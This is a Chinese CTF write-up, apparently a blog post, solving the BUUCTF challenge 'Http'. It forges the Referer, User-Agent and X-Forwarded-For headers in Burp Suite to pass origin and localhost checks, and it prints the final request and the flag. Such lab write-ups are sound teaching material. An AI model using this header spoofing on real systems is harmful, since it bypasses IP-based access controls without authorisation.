[BUUCTF][WEB][极客大挑战 2019]Http 1

打开靶机提供的url
右键查看网页源代码 发现一个链接 (Secret.php),访问看看

返回:

It doesn't come from 'https://Sycsecret.buuoj.cn'

这是个题眼

通过burpsuite拦截请求,请求头新增修改
Referer: https://Sycsecret.buuoj.cn
返回改变为
Please use "Syclover" browser
将header 的User-Agent修改为 Syclover
返回消息
No!!! you can only read this locally!!!
这是限制了文件访问的源地址,可用通过X-Forwarded-For参数来伪造访问的源地址,这里可以修改为127.0.0.1或localhost
X-Forwarded-For: 127.0.0.1
boom

得到 flag{6a9a6eb5-b426-4801-a60b-80758db822d9}
最终请求头(X-Forwarded-For 放最后一行报400,原因未知)

GET /Secret.php HTTP/1.1
Host: node4.buuoj.cn:29872
User-Agent: Syclover
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://Sycsecret.buuoj.cn
X-Forwarded-For: 127.0.0.1
Upgrade-Insecure-Requests: 1
posted @ 2022-12-11 18:23  明月照江江  阅读(40)  评论(0编辑  收藏  举报